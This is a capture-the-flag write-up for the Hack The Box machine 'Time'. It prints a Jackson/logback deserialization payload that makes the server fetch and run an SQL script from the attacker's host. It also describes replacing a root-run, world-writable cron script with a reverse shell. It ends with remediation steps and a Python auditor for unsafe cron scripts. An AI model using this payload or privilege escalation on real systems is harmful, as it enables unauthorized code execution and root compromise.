Hackthebox Time WriteUp

Time is a medium-level machine. The web server runs a Java application that uses a vulnerable Jackson library for JSON deserialization. After getting a shell, there is a cron job that runs with root privileges and that the user has write access to. With all that being said, let's just jump in!

root@kali:~/htb/boxes/time# nmap -T4 -A -p- -oA time -v 10.10.10.214
# Nmap 7.91 scan initiated Mon Oct 26 07:25:13 2020 as: nmap -T4 -A -p- -oA time -v 10.10.10.214
Nmap scan report for 10.10.10.214
Host is up (0.047s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
| 256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_ 256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 7D4140C76BF7648531683BFA4F7F8C22
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Head over to port 80, where there is a JSON page.

Give it a random character to deserialize and see what happens.

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unexpected character ('`' (code 96)): expected a valid value (number, String, array, object, 'true', 'false' or 'null')

The error above indicates the server is using the Jackson Java library. Searching for related exploits turned up the one below.

Create a payload named inject.sql as shown in the screenshot from the exploit page. Then use Python's SimpleHTTPServer to host the payload, and submit the string below so that the web server executes the payload.

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.28:81/inject.sql'"}]

Running linpeas shows a cron job script (/usr/bin/timer_backup.sh) to which the user pericles has write permission.

pericles@time:/home$ ls -l /usr/bin/timer_backup.sh
-rwxrw-rw- 1 pericles pericles 88 Apr 1 12:50 /usr/bin/timer_backup.sh
pericles@time:/home$ cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip

Run pspy to monitor all running processes on the machine. It shows that root is executing the cron job!

Change the file to a reverse shell and let root execute it.

  1. Update the Jackson library on the server.
  2. Remove the timer_backup.sh cron job on the machine.
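
An added example (not from the original write-up) that audits for the cron weakness found above: it reads crontab text in /etc/crontab format and flags any script run as root that is not owned by root or is group- or world-writable. The sample crontab, its schedule and the function names are assumptions; only the script path and its -rwxrw-rw- mode come from the page.

```python
import os
import stat

# Constructed sample in /etc/crontab format; the schedules are assumptions.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
*/1 * * * * root /usr/bin/timer_backup.sh
17 * * * * www-data /usr/local/bin/rotate.sh
"""

def root_commands(crontab_text):
    """Yield the executable path of every crontab entry that runs as root."""
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7 or "=" in fields[0]:  # env assignments, short lines
            continue
        if fields[5] == "root":
            yield fields[6].split()[0]

def mode_findings(st_mode, st_uid):
    """Return reasons why a file with this mode/owner is unsafe for root to run."""
    findings = []
    if st_uid != 0:
        findings.append(f"owned by non-root uid {st_uid}")
    if st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings

def audit(crontab_text):
    """Map each root-run path to its findings; clean files are omitted."""
    report = {}
    for path in root_commands(crontab_text):
        try:
            st = os.stat(path)  # follows symlinks: the target is what root runs
            found = mode_findings(st.st_mode, st.st_uid)
        except OSError as exc:
            found = [f"cannot stat: {exc.strerror}"]
        if found:
            report[path] = found
    return report

if __name__ == "__main__":
    for path, found in audit(SAMPLE_CRONTAB).items():
        print(path, "->", ", ".join(found))
```

On the box, the mode shown earlier (-rwxrw-rw-, owner pericles) would produce all three findings for /usr/bin/timer_backup.sh.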

Jim Solomon

Christian, Studying Cyber Security and Digital Forensics, Security Consultant at 12security.com | OSCP